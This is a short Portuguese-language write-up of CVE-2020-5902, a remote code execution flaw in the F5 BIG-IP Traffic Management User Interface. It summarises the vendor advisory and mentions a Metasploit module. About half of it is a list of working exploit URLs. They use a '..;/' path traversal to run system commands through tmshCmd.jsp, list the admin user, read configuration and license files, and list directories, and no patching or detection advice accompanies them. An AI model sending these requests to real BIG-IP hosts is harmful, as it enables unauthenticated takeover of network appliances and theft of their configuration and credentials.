
[CVE-2020-5902] F5 BIG-IP Execução Remota de Código (RCE)
[CVE-2020-5902] Execução Remota de Código na Interface de Gerenciamento de Tráfego (TMUI) do F5 BIG-IP
Nas versões 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1 e 11.6.1-11.6.5.1 do BIG-IP, a Interface de Gerenciamento de Tráfego (TMUI), também chamada de utilitário de Configuração, apresenta uma vulnerabilidade de Execução Remota de Código (RCE) em páginas não divulgadas.
Essa vulnerabilidade permite que atacantes não autenticados, ou usuários autenticados, com acesso de rede ao utilitário de Configuração, por meio da porta de gerenciamento do BIG-IP e/ou self IPs, executem comandos arbitrários do sistema, criem ou excluam arquivos, desativem serviços e/ou executem código Java arbitrário. Essa vulnerabilidade pode resultar em comprometimento total do sistema. O sistema BIG-IP no modo Appliance também é vulnerável. Esse problema não é exposto no plano de dados; apenas o plano de controle é afetado.
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/
O aviso de segurança original foi publicado pela F5 e você pode acessá-lo aqui
Além disso, há um módulo do Metasploit disponível para o CVE-2020-5902 com classificação Excelente. Você pode encontrar os códigos Ruby do módulo do Metasploit para exploits/linux/http/f5_bigip_tmui_rce.rb